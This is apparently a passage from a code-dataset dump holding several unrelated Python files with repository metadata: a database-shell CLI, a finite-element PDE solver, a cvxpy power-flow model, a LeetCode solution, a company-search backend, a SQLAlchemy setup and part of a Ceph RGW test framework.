if min_pval < 0.05 / shap_values.shape[1]:
pl.axvline(min_pval_ind, linestyle="dashed", color="#666666", alpha=0.2)
pl.scatter(xs, ys, s=10, c=features[:,ind], cmap=colors.red_blue)
pl.xlabel("Sample index")
pl.ylabel(truncate_text(feature_names[ind], 30) + "\nSHAP value", size=13)
pl.gca().xaxis.set_ticks_position('bottom')
pl.gca().yaxis.set_ticks_position('left')
pl.gca().spines['right'].set_visible(False)
pl.gca().spines['top'].set_visible(False)
cb = pl.colorbar()
cb.outline.set_visible(False)
bbox = cb.ax.get_window_extent().transformed(pl.gcf().dpi_scale_trans.inverted())
cb.ax.set_aspect((bbox.height - 0.7) * 20)
cb.set_label(truncate_text(feature_names[ind], 30), size=13)
pl.show() | 33.769231 | 85 | 0.648823 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 985 | 0.373956 |
6a1f7efcf406b9bcc9bc35cc271b47eed9db309f | 7,998 | py | Python | mod_core.py | nokia-wroclaw/innovativeproject-dbshepherd | f82f3b36caaf9fcd6d28076051cb92458ba2edd3 | [
"MIT"
] | null | null | null | mod_core.py | nokia-wroclaw/innovativeproject-dbshepherd | f82f3b36caaf9fcd6d28076051cb92458ba2edd3 | [
"MIT"
] | null | null | null | mod_core.py | nokia-wroclaw/innovativeproject-dbshepherd | f82f3b36caaf9fcd6d28076051cb92458ba2edd3 | [
"MIT"
] | 1 | 2020-02-05T20:02:15.000Z | 2020-02-05T20:02:15.000Z | import re
import os
import cmd
import sys
import common
from getpass import getpass
from kp import KeePassError, get_password
from configmanager import ConfigManager, ConfigManagerError
common.init()
class ParseArgsException(Exception):
def __init__(self, msg):
self.msg = msg
class ModuleCore(cmd.Cmd):
def __init__(self, module = ''):
cmd.Cmd.__init__(self)
self.master = None
if module == '#':
self.prompt_sign = '#>'
elif module != '':
self.prompt_sign = '[' + module + ']>'
else:
self.prompt_sign = '->'
#defaults
self.ruler = '-'
self.warn = True
#Completions
self.directories = []
self.file_server_database = []
self.file_server = []
self.do_cd('.')
configs = ConfigManager().get_config_list()
for conf in configs:
self.file_server_database.append(conf)
self.file_server.append(conf)
for srv in ConfigManager('config/' + conf + '.yaml').get_all():
self.file_server_database.append(conf + '.' + srv)
self.file_server.append(conf + '.' + srv)
for db in ConfigManager('config/' + conf + '.yaml').get(srv)['databases']:
self.file_server_database.append(conf + '.' + srv + '.' + db)
def precmd(self, line):
if not sys.stdin.isatty():
print(line)
return line
def postcmd(self, stop, line):
if not sys.stdin.isatty():
print("")
return stop
def parse_args(self, string="", n=0, m=0):
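# Split the input into quoted strings or plain tokens and validate the token count against the expected range [n, m]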
list = re.findall('"+.*"+|[a-zA-Z0-9!@#$%^&*()_+-,./<>?]+', string)
arg_counter = len(list);
if (arg_counter >= n and arg_counter <= m) or (arg_counter == n and m == 0) or n == 0:
r_list = []
for l in list:
r_list.append(l.replace('"', ''))
return (r_list, len(list))
else:
raise ParseArgsException("Incorrect number of arguments")
# Executes the given function (callback) on all databases
def exec_on_config(self, callback, args, values, view = ''): # link - file.server.base
if values == '': # execute on all config files
files = ConfigManager().get_config_list() # get the list of configuration files
# show what the command is going to be executed on
print("Exec on:")
for file in files:
print('+-',file)
ans = input("Are you sure? [NO/yes/info]: ")
if ans == "yes": #wykonaj callback
for file in files:
if view == 'tree': print('+-', file)
try:
servers = ConfigManager("config/" + file + ".yaml").get_all()
for srv in servers:
if view == 'tree': print("| +-", srv)
databases = servers[srv]["databases"]
for db in databases:
if view == 'tree': print("| | +-", db)
if view == 'list': print('[', file, '->', srv, '->', db, ']')
callback(file, srv, db, *args)
except ConfigManagerError as e:
print(e)
elif ans == "info": #podaj tylko informację na czym callback zostałby wykonany
for file in files:
print('+-', file)
servers = ConfigManager("config/" + file + ".yaml").get_all()
for srv in servers:
print('| +-', srv)
databases = servers[srv]["databases"]
for db in databases:
print('| | +-', db)
else: # abort if the user decides not to execute anything
print("aborted")
else: # a specific target was given
val = values.split('.') # split into file_name.server.database
params = len(val)
if params == 1: # only a file name was given - execute on every server and database defined in it
file = val[0]
try:
servers = ConfigManager("config/" + file + ".yaml").get_all()
for srv in servers:
if view == 'tree': print("+-", srv)
databases = servers[srv]["databases"]
for db in databases:
if view == 'tree': print("| +-", db)
if view == 'list': print('[', srv, '->', db, ']')
callback(file, srv, db, *args)
except ConfigManagerError as e:
print(e)
except KeyError as e:
print(e, "is not exist")
elif params == 2: # file name and server given - execute on every database on that server
file = val[0]
try:
servers = ConfigManager("config/" + file + ".yaml").get_all()
srv = val[1]
databases = servers[srv]["databases"]
for db in databases:
if view == 'tree': print("+-", db)
if view == 'list': print('[', db, ']')
callback(file, srv, db, *args)
except ConfigManagerError as e:
print(e)
except KeyError as e:
print(e, "is not exist")
elif params == 3: # file name, server and database given - execute exactly on that database
try:
callback(val[0], val[1], val[2], *args)
except ConfigManagerError as e:
print(e)
except KeyError as e:
print(e, "is not exist")
# Helper - returns a shortened path to the current directory
def get_shortpath(self):
path = common.get_cdir()
separator = ''
if '\\' in path:
separator = '\\'
else:
separator = '/'
start = path.find(separator)
end = path.rfind(separator, 0, len(path)-1)
if start < end:
return (path[0:start+1] + '...' + path[end:])
else:
return (path)
# Autocompletion for the cd command
def complete_cd(self, text, line, begidx, endidx):
if not text:
completions = self.directories[:]
else:
completions = [f for f in self.directories if f.startswith(text)]
return completions
# cd command - allows moving between directories
def do_cd(self, args):
"Move to directory"
if args == '':
print(common.get_cdir())
else:
try:
common.chdir(args)
self.prompt = self.get_shortpath() + ' ' + self.prompt_sign
self.directories = []
for name in os.listdir(common.get_cdir()):
if os.path.isdir(os.path.join(common.get_cdir(), name)):
self.directories.append(name)
except FileNotFoundError as e:
print(e)
# Lists all files in the current location
def do_ls(self, args):
"List directory"
for name in os.listdir(common.get_cdir()):
print(name)
# Prints the full path of the current directory
def do_pwd(self, args):
"Print path"
print(common.get_cdir())
# Lets the user decide whether warnings should be displayed
def do_warn(self, args):
"""warn <on/off>"""
try:
(values, values_num) = self.parse_args(args, 0, 1)
if values_num == 1:
if values[0] == 'on':
print('Warnings on')
self.warn = True
elif values[0] == 'off':
print('Warnings off')
self.warn = False
else:
print('Incorrect argument.')
else:
if self.warn == True:
print('Status: on')
else:
print('Status: off')
except ParseArgsException as e:
print(e)
# Sets the master password for KeePass
def do_setMaster(self,args):
"Set master password"
if sys.stdin.isatty(): # if running as an interactive shell
p = getpass('Enter Master Password: ')
else:
p = sys.stdin.readline().rstrip()
self.master = p
def do_exit(self, *args):
return True
def do_EOF(self, line):
return True
def emptyline(self):
return False
# We need to catch everything possible - missing file, wrong master password etc. - and raise a single exception
def get_password(self, alias):
keepass_path = common.keepass_path
if self.master == None:
raise KeePassError("Master Password Not Set")
try:
return get_password(keepass_path, self.master, alias)
except KeePassError as e:
raise e
def connect_command_builder(self,connection, perm):
try:
command = connection["adress"] + "_" + connection["user"]+ "_" + \
self.get_password(connection["keepass"]) + "_" + str(connection["sshport"]) + "_" + str(connection["remoteport"]) + "_" + perm
except (KeyError, KeePassError) as e1:
try:
command = connection["adress"] + "_" + connection["user"]+ "_" + \
connection["passwd"] + "_" + str(connection["sshport"]) + "_" + str(connection["remoteport"]) + "_" + perm
return command
except KeyError as e2:
if isinstance(e1,KeePassError):
raise KeePassError("Unable to use Keepass(" + e1.value + ") or Password")
else:
raise KeePassError("Invalid connection in yaml file")
return command | 29.512915 | 132 | 0.635159 | 7,834 | 0.974257 | 0 | 0 | 0 | 0 | 0 | 0 | 2,123 | 0.264022 |
6a2025301420406c02ae8d4c4fc4c88641b66f90 | 7,702 | py | Python | code/testbed/pde1/FemPde1.py | nicolai-schwartze/Masterthesis | 7857af20c6b233901ab3cedc325bd64704111e16 | [
"MIT"
] | 1 | 2020-06-13T10:02:02.000Z | 2020-06-13T10:02:02.000Z | code/testbed/pde1/FemPde1.py | nicolai-schwartze/Masterthesis | 7857af20c6b233901ab3cedc325bd64704111e16 | [
"MIT"
] | null | null | null | code/testbed/pde1/FemPde1.py | nicolai-schwartze/Masterthesis | 7857af20c6b233901ab3cedc325bd64704111e16 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Created on Mon Apr 13 14:57:32 2020
@author: Nicolai
"""
import sys
import os
importpath = os.path.dirname(os.path.realpath(__file__)) + "/../"
sys.path.append(importpath)
from FemPdeBase import FemPdeBase
import numpy as np
# import from ngsolve
import ngsolve as ngs
from netgen.geom2d import unit_square
import time
import psutil
import gc
class FemPde1(FemPdeBase):
"""
**Implementation of PDE1 of the testbed:**
.. math::
- \Delta u(\mathbf{x}) = -2^{40}y^{10}(1-y)^{10}[90x^8(1-x)^{10}
- 200x^9(1-x)^9 + 90x^{10}(1-x)^8]
-2^{40}x^{10}(1-x)^{10}[90y^8(1-y)^{10}
- 200y^9(1-y)^9 + 90y^{10}(1-y)^8]
\Omega: \mathbf{x} \in [0,1]
u(\mathbf{x})|_{\partial \Omega} = 0
**with the solution:**
.. math::
u(\mathbf{x}) = 2^{40}x^{10}(1-x)^{10}y^{10}(1-y)^{10}
Attributes
----------
    max_ndof: int
        the maximum number of degrees of freedom that can be created in the
        adaptive mesh refinement, default value is 50000
Methods
-------
solve()
solves the pde by calling ngsolve, provides: static condensation,
adaptive mesh refinement, parallelisation (where possible), sets the
internal variables for evaluating the exact solution and calculating
the distance between exact and approx solution
also sets execution time and memory consumption
Examples
--------
>>> import numpy as np
    >>> fempde1 = FemPde1(True)
    >>> pos = np.array([0.5, 0.5])
    >>> fempde1.exact(pos)
    >>> x -> numpy.ndarray with shape (2,)
        _mesh -> ngs.comp.Mesh
        _ngs_ex -> ngs.fem.CoefficientFunction
        -> try to call solve() first
    >>> fempde1.solve()
    >>> fempde1.exact(pos)
    1.0
    >>> fempde1.approx(pos)
    0.999998924259486
    >>> fempde1.normL2()
    5.853102150391562e-07
    >>> fempde1.exec_time
    3.830256175994873
    >>> fempde1.mem_consumption
76705792
"""
def __init__(self, show_gui, max_ndof=50000):
super().__init__(show_gui)
# init protected
self._pde_string = "-laplacian(u(x)) = -(2^40*y^10*(1-y)^10*(90*x^8*(1-x)^10 - 200*x^9*(1-x)^9 + 90*x^10*(1-x)^8)) -(2^40*x^10*(1-x)^10*(90*y^8*(1-y)^10 - 200*y^9*(1-y)^9 + 90*y^10*(1-y)^8))"
self._ngs_ex = (2**(4*10))*(ngs.x**10)*((1-ngs.x)**10)*(ngs.y**10)*((1-ngs.y)**10)
# init public
self.max_ndof = max_ndof
def solve(self):
# disable garbage collector
# --------------------------------------------------------------------#
gc.disable()
while(gc.isenabled()):
time.sleep(0.1)
# --------------------------------------------------------------------#
# measure how much memory is used until here
process = psutil.Process()
memstart = process.memory_info().vms
# starts timer
tstart = time.time()
if self.show_gui:
import netgen.gui
# create mesh with initial size 0.1
self._mesh = ngs.Mesh(unit_square.GenerateMesh(maxh=0.1))
#create finite element space
self._fes = ngs.H1(self._mesh, order=2, dirichlet=".*", autoupdate=True)
        # test and trial function
u = self._fes.TrialFunction()
v = self._fes.TestFunction()
# create bilinear form and enable static condensation
self._a = ngs.BilinearForm(self._fes, condense=True)
self._a += ngs.grad(u)*ngs.grad(v)*ngs.dx
        # create linear functional and apply RHS
self._f = ngs.LinearForm(self._fes)
self._f += ( \
-(2**40*ngs.y**10*(1-ngs.y)**10*(90*ngs.x**8*(1-ngs.x)**10 - 200*ngs.x**9*(1-ngs.x)**9 + 90*ngs.x**10*(1-ngs.x)**8)) \
-(2**40*ngs.x**10*(1-ngs.x)**10*(90*ngs.y**8*(1-ngs.y)**10 - 200*ngs.y**9*(1-ngs.y)**9 + 90*ngs.y**10*(1-ngs.y)**8)) )*v*ngs.dx
        # preconditioner: multigrid - what prerequisites must the problem have?
self._c = ngs.Preconditioner(self._a,"multigrid")
# create grid function that holds the solution and set the boundary to 0
self._gfu = ngs.GridFunction(self._fes, autoupdate=True) # solution
self._g = 0.0
self._gfu.Set(self._g, definedon=self._mesh.Boundaries(".*"))
# draw grid function in gui
if self.show_gui:
ngs.Draw(self._gfu)
# create Hcurl space for flux calculation and estimate error
self._space_flux = ngs.HDiv(self._mesh, order=2, autoupdate=True)
self._gf_flux = ngs.GridFunction(self._space_flux, "flux", autoupdate=True)
        # TaskManager starts worker threads (the default thread count is the number of cores)
with ngs.TaskManager():
# this is the adaptive loop
while self._fes.ndof < self.max_ndof:
self._solveStep()
self._estimateError()
self._mesh.Refine()
# since the adaptive loop stopped with a mesh refinement, the gfu must be
# calculated one last time
self._solveStep()
if self.show_gui:
ngs.Draw(self._gfu)
        # set measured execution time
self._exec_time = time.time() - tstart
# set measured used memory
memstop = process.memory_info().vms - memstart
self._mem_consumption = memstop
# enable garbage collector
# --------------------------------------------------------------------#
gc.enable()
gc.collect()
# --------------------------------------------------------------------#
if __name__ == "__main__":
fempde1 = FemPde1(True)
print(fempde1.pde_string)
try:
fempde1.exact(np.array([0.5,0.5]))
except:
print("Î error message above")
try:
fempde1.approx(np.array([0.5,0.5]))
except:
print("Î error message above")
fempde1.solve()
print("-------------------------------------")
print("exact(0.5, 0.5) = {}".format(fempde1.exact(np.array([0.5,0.5]))))
print("approx(0.5, 0.5) = {}".format(fempde1.approx(np.array([0.5,0.5]))))
print("L2 norm to the real solution {}".format(fempde1.normL2()))
print("solving took {} sec".format(fempde1.exec_time))
print("solving uses {} Mb".format(fempde1.mem_consumption/1000000))
from mpl_toolkits.mplot3d import Axes3D
import matplotlib.pyplot as plt
from matplotlib import cm
fig = plt.figure()
ax = fig.add_subplot(111, projection='3d')
x = y = np.arange(0, 1.01, 0.01)
X, Y = np.meshgrid(x, y)
zs0 = np.array([fempde1.exact(\
np.array([x,y])) for x,y in zip(np.ravel(X), np.ravel(Y))])
Z = zs0.reshape(X.shape)
ax.plot_surface(X, Y, Z, cmap=cm.gnuplot)
fig.tight_layout()
ax.set_xlabel("X0")
ax.set_ylabel("X1")
ax.set_zlabel("f(X0, X1)")
plt.show()
fig.savefig("sol_pde_1.pdf", bbox_inches='tight')
fig = plt.figure()
ax = fig.add_subplot(111, projection='3d')
x = y = np.arange(0, 1.01, 0.01)
X, Y = np.meshgrid(x, y)
zs0 = np.array([fempde1.approx(\
np.array([x,y])) for x,y in zip(np.ravel(X), np.ravel(Y))])
Z = zs0.reshape(X.shape)
ax.plot_surface(X, Y, Z, cmap=cm.gnuplot)
ax.set_xlabel("X0")
ax.set_ylabel("X1")
ax.set_zlabel("f(X0,X1)")
plt.show()
| 31.695473 | 199 | 0.532849 | 5,508 | 0.714953 | 0 | 0 | 0 | 0 | 0 | 0 | 3,411 | 0.442757 |
6a20c03889abf01d98da2c14b133084ab0890d44 | 3,324 | py | Python | cvxpy/cvxcore/tests/python/364A_scripts/power_lines.py | jasondark/cvxpy | 56aaa01b0e9d98ae5a91a923708129a7b37a6f18 | [
"ECL-2.0",
"Apache-2.0"
] | 38 | 2015-10-16T16:55:28.000Z | 2022-02-16T05:06:01.000Z | cvxpy/cvxcore/tests/python/364A_scripts/power_lines.py | h-vetinari/cvxpy | 86307f271819bb78fcdf64a9c3a424773e8269fa | [
"ECL-2.0",
"Apache-2.0"
] | 28 | 2015-09-16T16:33:23.000Z | 2021-11-23T07:31:44.000Z | cvxpy/cvxcore/tests/python/364A_scripts/power_lines.py | h-vetinari/cvxpy | 86307f271819bb78fcdf64a9c3a424773e8269fa | [
"ECL-2.0",
"Apache-2.0"
] | 21 | 2015-09-16T14:56:16.000Z | 2022-02-16T05:06:03.000Z | import numpy as np
from cvxpy import *
import copy
import time
# data for power flow problem
import numpy as np
n = 12 # total number of nodes
m = 18 # number of edges (transmission lines)
k = 4 # number of generators
# transmission line capacities =
TIME = 0
Pmax = np.matrix("""
4.8005,
1.9246,
3.4274,
2.9439,
4.5652,
4.0484,
2.8259,
1.0740,
4.2856,
2.7788,
3.4617,
4.1677,
4.6873,
3.9528,
1.7051,
2.6228,
4.7419,
4.6676,
""")
Gmax = np.matrix("3; 2; 4; 7") # maximum generator power
c = np.matrix("4; 8; 5; 3") # supply generator costs
d = np.matrix("""
1.6154
2.3405
1.0868
1.5293
2.2197
1.0148
1.2083
1.3041
""")# network power demands
# graph incidence matrix
A = np.matrix(""" -1 -1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ;
0 0 -1 -1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ;
0 0 0 0 0 0 0 0 0 -1 -1 0 0 0 0 0 0 -1 ;
0 0 0 0 0 0 -1 0 0 0 0 0 0 0 -1 0 -1 0 ;
1 0 0 0 1 -1 0 0 0 0 0 0 0 0 0 0 0 0 ;
0 1 1 0 -1 0 1 -1 0 0 0 0 0 0 0 0 0 0 ;
0 0 0 1 0 0 0 0 -1 1 0 0 0 0 0 0 0 0 ;
0 0 0 0 0 0 0 1 1 0 0 0 -1 0 1 0 0 1 ;
0 0 0 0 0 0 0 0 0 0 1 -1 0 0 0 0 0 0 ;
0 0 0 0 0 0 0 0 0 0 0 1 1 -1 0 0 0 0 ;
0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 1 0 0 ;
0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 -1 1 0
""")
g = Variable(k)
p = Variable(m)
obj = Minimize(c.T*g)
constraints = [A*p == vstack(-g, d.T), abs(p) <= Pmax.T, 0 <= g, g <= Gmax]
prob = Problem(obj, constraints)
tic = time.time()
val = prob.solve()
toc = time.time()
TIME += toc - tic
ANSWERS.append(val)
pass #print val
pass #print g.value
# N - 1 contingency
g = Variable(k)
flows = []
obj = Minimize(c.T*g)
for i in range(m):
flows.append(Variable(m))
constraints = [g <= Gmax, 0 <= g]
for i in range(m): # N -1 redundancy
constraints.append(A*flows[i] == vstack(-g, d.T))
constraints.append( flows[i][i] == 0 )
constraints.append( abs(flows[i]) <= Pmax.T )
prob = Problem(obj, constraints)
tic = time.time()
val = prob.solve()
toc = time.time()
TIME += toc - tic
ANSWERS.append(val)
pass #print val
pass #print g.value
# the code below is not data for the problem
# it is used only to generate the network graph
# x-y coordinates
# each row is node x-y coordinates
XY = np.matrix("""
1.5 5.2;
4.9 5;
6.9 3.5;
1.9 3.5;
0.2 4.4;
3.2 4.8;
5.9 4.5;
3.9 3.6;
5.9 2.5;
3.9 3;
1.4 2.5;
0 3
""");
# node adjacency matrix
Ad = -A*A.T
Ad = Ad - np.diag(np.diag(Ad))
epsx = 0.05; epsy = 0.15; # text placing offset
# plotting
import matplotlib.pyplot as plt
for i in range(12): #plot edges
for j in range(i):
if Ad[i,j] == 1:
pass #plt.plot((XY[i,0], XY[j,0]), (XY[i,1], XY[j,1]), 'k-')
for j in range(k): #plot nodes
pass #plt.plot(XY[j,0],XY[j,1],'rs', markersize=12)
pass #plt.text(XY[j,0]-epsx,XY[j,1]+epsy,str(j+1))
for j in range(k,n):
pass #plt.plot(XY[j,0],XY[j,1],'ko')
pass #plt.axis('off')
pass #plt.savefig('pwr_net.eps')
if __name__ == '__main__':
pass #plt.show() | 23.083333 | 75 | 0.513538 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2,061 | 0.620036 |
6a213e8a5b6a8886b1f3aeab6a75af090df46ca9 | 996 | py | Python | LeetCode/530 Minimum Absolute Difference in BST.py | gesuwen/Algorithms | 0c9cf4412d76f8b69ef68cc80636323f5a0e5786 | [
"MIT"
] | null | null | null | LeetCode/530 Minimum Absolute Difference in BST.py | gesuwen/Algorithms | 0c9cf4412d76f8b69ef68cc80636323f5a0e5786 | [
"MIT"
] | null | null | null | LeetCode/530 Minimum Absolute Difference in BST.py | gesuwen/Algorithms | 0c9cf4412d76f8b69ef68cc80636323f5a0e5786 | [
"MIT"
] | null | null | null | # Binary Search Tree
# Given a binary search tree with non-negative values, find the minimum absolute difference between values of any two nodes.
#
# Example:
#
# Input:
#
# 1
# \
# 3
# /
# 2
#
# Output:
# 1
#
# Explanation:
# The minimum absolute difference is 1, which is the difference between 2 and 1 (or between 2 and 3).
# Definition for a binary tree node.
# class TreeNode:
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution:
def getMinimumDifference(self, root):
"""
:type root: TreeNode
:rtype: int
"""
self.minDiff = []
def travel(node):
if not node:
return
self.minDiff.append(node.val)
            travel(node.left)
            travel(node.right)
travel(root)
self.minDiff = sorted(self.minDiff)
return min(abs(a - b) for a, b in zip(self.minDiff, self.minDiff[1:]))
| 23.162791 | 124 | 0.566265 | 485 | 0.486948 | 0 | 0 | 0 | 0 | 0 | 0 | 548 | 0.550201 |
6a240de4a4b62bd30eb577321f80af837069962e | 2,029 | py | Python | backends/search/__init__.py | dev-easyshares/company | 61842839121f308619c59a8f52ab76c8b9dcdd30 | [
"MIT"
] | null | null | null | backends/search/__init__.py | dev-easyshares/company | 61842839121f308619c59a8f52ab76c8b9dcdd30 | [
"MIT"
] | null | null | null | backends/search/__init__.py | dev-easyshares/company | 61842839121f308619c59a8f52ab76c8b9dcdd30 | [
"MIT"
] | null | null | null | from company.choices import fr as choices
from mighty.errors import BackendError
import datetime, logging
logger = logging.getLogger(__name__)
CHOICES_APE = dict(choices.APE)
CHOICES_LEGALFORM = dict(choices.LEGALFORM)
CHOICES_SLICE = dict(choices.SLICE_EFFECTIVE)
class SearchBackend:
message = None
since_format = None
iso_format = '%Y-%m-%dT%H:%M:%S.%f%z'
def in_error(self, message):
self.message = message
def backend_error(self, msg):
raise BackendError(msg)
def companies(self, companies, response_code):
if str(response_code)[0] == '4': self.in_error(companies[0]['message'])
elif str(response_code)[0] == '5': self.in_error('error server')
return companies
def get_ape_str(self, code):
try:
return CHOICES_APE[code]
except Exception:
pass
return code
def get_legalform_str(self, code):
try:
code = int(code)
return CHOICES_LEGALFORM[code]
except Exception:
pass
return code
def get_slice_str(self, code):
try:
return CHOICES_SLICE[code]
except Exception:
pass
return code
def lastupdate(self, date):
return datetime.datetime.strptime(date, self.iso_format).strftime("%Y-%m-%d")
def since(self, date):
logger.warning(date)
return datetime.datetime.strptime(date, self.since_format).strftime("%Y-%m-%d")
def get_companies(self, companies, response_code):
raise NotImplementedError("Subclasses should implement get_companies()")
def get_company_by_siren(self, siren):
raise NotImplementedError("Subclasses should implement get_company_by_siren()")
def get_company_by_fulltext(self, fulltext):
raise NotImplementedError("Subclasses should implement get_company_by_fulltext()")
def get_active_companies(self, fulltext):
raise NotImplementedError("Subclasses should implement get_active_companies()") | 31.215385 | 90 | 0.670281 | 1,762 | 0.868408 | 0 | 0 | 0 | 0 | 0 | 0 | 277 | 0.13652 |
6a24c49a2e92d735c1970a4ba7a5a35023549f08 | 504 | py | Python | app/database/database.py | luisornelasch/melp | 82ff5c84d0df866ee64da10b96f61400c0809845 | [
"MIT"
] | null | null | null | app/database/database.py | luisornelasch/melp | 82ff5c84d0df866ee64da10b96f61400c0809845 | [
"MIT"
] | null | null | null | app/database/database.py | luisornelasch/melp | 82ff5c84d0df866ee64da10b96f61400c0809845 | [
"MIT"
] | null | null | null | from sqlalchemy import create_engine, engine
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import sessionmaker
import os
SQLALCHEMY_DATABASE_URL = os.getenv("DATABASE_URL").replace("postgres://", "postgresql+psycopg2://")
engine = create_engine(SQLALCHEMY_DATABASE_URL)
SessionLocal = sessionmaker(autocommit=False, autoflush=False, bind=engine)
Base = declarative_base()
def get_db():
db = SessionLocal()
try:
yield db
finally:
db.close()
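# Example (assumption, not part of the original file): get_db() follows the typical
# FastAPI dependency pattern, so a route would normally consume it via Depends().
# The route path and the Restaurant model below are illustrative only.
#
# from fastapi import Depends
# from sqlalchemy.orm import Session
#
# @app.get("/restaurants")
# def list_restaurants(db: Session = Depends(get_db)):
#     return db.query(Restaurant).all()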
| 24 | 100 | 0.753968 | 0 | 0 | 95 | 0.188492 | 0 | 0 | 0 | 0 | 51 | 0.10119 |
6a25b6baad0282a34406b60b6191667dfe9a128b | 13,698 | py | Python | ragweed/framework.py | soumyakoduri/ragweed | 7d4a729ff761fe1ca073b7ceade46acf1321e9fd | [
"MIT"
] | null | null | null | ragweed/framework.py | soumyakoduri/ragweed | 7d4a729ff761fe1ca073b7ceade46acf1321e9fd | [
"MIT"
] | null | null | null | ragweed/framework.py | soumyakoduri/ragweed | 7d4a729ff761fe1ca073b7ceade46acf1321e9fd | [
"MIT"
] | null | null | null | import sys
import os
import boto
import boto.s3.connection
import json
import inspect
import pickle
import bunch
import yaml
import ConfigParser
import rados
from boto.s3.key import Key
from nose.plugins.attrib import attr
from nose.tools import eq_ as eq
from .reqs import _make_admin_request
ragweed_env = None
suite = None
class RGWConnection:
def __init__(self, access_key, secret_key, host, port, is_secure):
self.host = host
self.port = port
self.is_secure = is_secure
self.conn = boto.connect_s3(
aws_access_key_id = access_key,
aws_secret_access_key = secret_key,
host=host,
port=port,
is_secure=is_secure,
calling_format = boto.s3.connection.OrdinaryCallingFormat(),
)
def create_bucket(self, name):
return self.conn.create_bucket(name)
def get_bucket(self, name, validate=True):
return self.conn.get_bucket(name, validate=validate)
class RGWRESTAdmin:
def __init__(self, connection):
self.conn = connection
def get_resource(self, path, params):
r = _make_admin_request(self.conn, "GET", path, params)
if r.status != 200:
raise boto.exception.S3ResponseError(r.status, r.reason)
return bunch.bunchify(json.loads(r.read()))
def read_meta_key(self, key):
return self.get_resource('/admin/metadata', {'key': key})
def get_bucket_entrypoint(self, bucket_name):
return self.read_meta_key('bucket:' + bucket_name)
def get_bucket_instance_info(self, bucket_name, bucket_id = None):
if not bucket_id:
ep = self.get_bucket_entrypoint(bucket_name)
print ep
bucket_id = ep.data.bucket.bucket_id
result = self.read_meta_key('bucket.instance:' + bucket_name + ":" + bucket_id)
return result.data.bucket_info
def check_bucket_index(self, bucket_name):
return self.get_resource('/admin/bucket',{'index' : None, 'bucket':bucket_name})
def get_obj_layout(self, key):
path = '/' + key.bucket.name + '/' + key.name
params = {'layout': None}
if key.version_id is not None:
params['versionId'] = key.version_id
print params
return self.get_resource(path, params)
def get_zone_params(self):
return self.get_resource('/admin/config', {'type': 'zone'})
class RSuite:
def __init__(self, name, bucket_prefix, zone, suite_step):
self.name = name
self.bucket_prefix = bucket_prefix
self.zone = zone
self.config_bucket = None
self.rtests = []
self.do_preparing = False
self.do_check = False
for step in suite_step.split(','):
if step == 'prepare':
self.do_preparing = True
self.config_bucket = self.zone.create_raw_bucket(self.get_bucket_name('conf'))
if step == 'check' or step == 'test':
self.do_check = True
self.config_bucket = self.zone.get_raw_bucket(self.get_bucket_name('conf'))
def get_bucket_name(self, suffix):
return self.bucket_prefix + '-' + suffix
def register_test(self, t):
self.rtests.append(t)
def write_test_data(self, test):
k = Key(self.config_bucket)
k.key = 'tests/' + test._name
k.set_contents_from_string(test.to_json())
def read_test_data(self, test):
k = Key(self.config_bucket)
k.key = 'tests/' + test._name
s = k.get_contents_as_string()
print 'read_test_data=', s
test.from_json(s)
def is_preparing(self):
return self.do_preparing
def is_checking(self):
return self.do_check
class RTestJSONSerialize(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, (list, dict, str, unicode, int, float, bool, type(None))):
            return json.JSONEncoder.default(self, obj)
return {'__pickle': pickle.dumps(obj)}
def rtest_decode_json(d):
if '__pickle' in d:
return pickle.loads(str(d['__pickle']))
return d
class RPlacementRule:
def __init__(self, rule):
r = rule.split('/', 1)
self.placement_id = r[0]
if (len(r) == 2):
self.storage_class=r[1]
else:
self.storage_class = 'STANDARD'
class RBucket:
def __init__(self, zone, bucket, bucket_info):
self.zone = zone
self.bucket = bucket
self.name = bucket.name
self.bucket_info = bucket_info
try:
self.placement_rule = RPlacementRule(self.bucket_info.placement_rule)
self.placement_target = self.zone.get_placement_target(self.bucket_info.placement_rule)
except:
pass
def get_data_pool(self):
try:
# old style explicit pool
explicit_pool = self.bucket_info.bucket.pool
except:
# new style explicit pool
explicit_pool = self.bucket_info.bucket.explicit_placement.data_pool
if explicit_pool is not None and explicit_pool != '':
return explicit_pool
return self.placement_target.get_data_pool(self.placement_rule)
def get_tail_pool(self, obj_layout):
try:
placement_rule = obj_layout.manifest.tail_placement.placement_rule
except:
placement_rule = ''
if placement_rule == '':
try:
# new style
return obj_layout.manifest.tail_placement.bucket.explicit_placement.data_pool
except:
pass
try:
# old style
return obj_layout.manifest.tail_bucket.pool
except:
pass
pr = RPlacementRule(placement_rule)
return self.placement_target.get_data_pool(pr)
class RStorageClasses:
def __init__(self, config):
if hasattr(config, 'storage_classes'):
self.storage_classes = config.storage_classes
else:
try:
self.storage_classes = bunch.bunchify({ 'STANDARD': { 'data_pool': config.data_pool }})
except:
self.storage_classes = None
pass
def get(self, storage_class):
assert(self.storage_classes != None)
try:
if not storage_class:
storage_class = 'STANDARD'
sc = self.storage_classes[storage_class]
except:
eq('could not find storage class ' + storage_class, 0)
return sc
def get_all(self):
for (name, _) in self.storage_classes.iteritems():
yield name
class RPlacementTarget:
def __init__(self, name, config):
self.name = name
self.index_pool = config.index_pool
self.data_extra_pool = config.data_extra_pool
self.storage_classes = RStorageClasses(config)
if not self.data_extra_pool:
            self.data_extra_pool = self.storage_classes.get('STANDARD').data_pool
def get_data_pool(self, placement_rule):
return self.storage_classes.get(placement_rule.storage_class).data_pool
class RZone:
def __init__(self, conn):
self.conn = conn
self.rgw_rest_admin = RGWRESTAdmin(self.conn.system)
self.zone_params = self.rgw_rest_admin.get_zone_params()
self.placement_targets = {}
for e in self.zone_params.placement_pools:
self.placement_targets[e.key] = e.val
print 'zone_params:', self.zone_params
def get_placement_target(self, placement_id):
plid = placement_id
if placement_id is None or placement_id == '':
print 'zone_params=', self.zone_params
plid = self.zone_params.default_placement
try:
return RPlacementTarget(plid, self.placement_targets[plid])
except:
pass
return None
def get_default_placement(self):
        return self.get_placement_target(self.zone_params.default_placement)
def create_bucket(self, name):
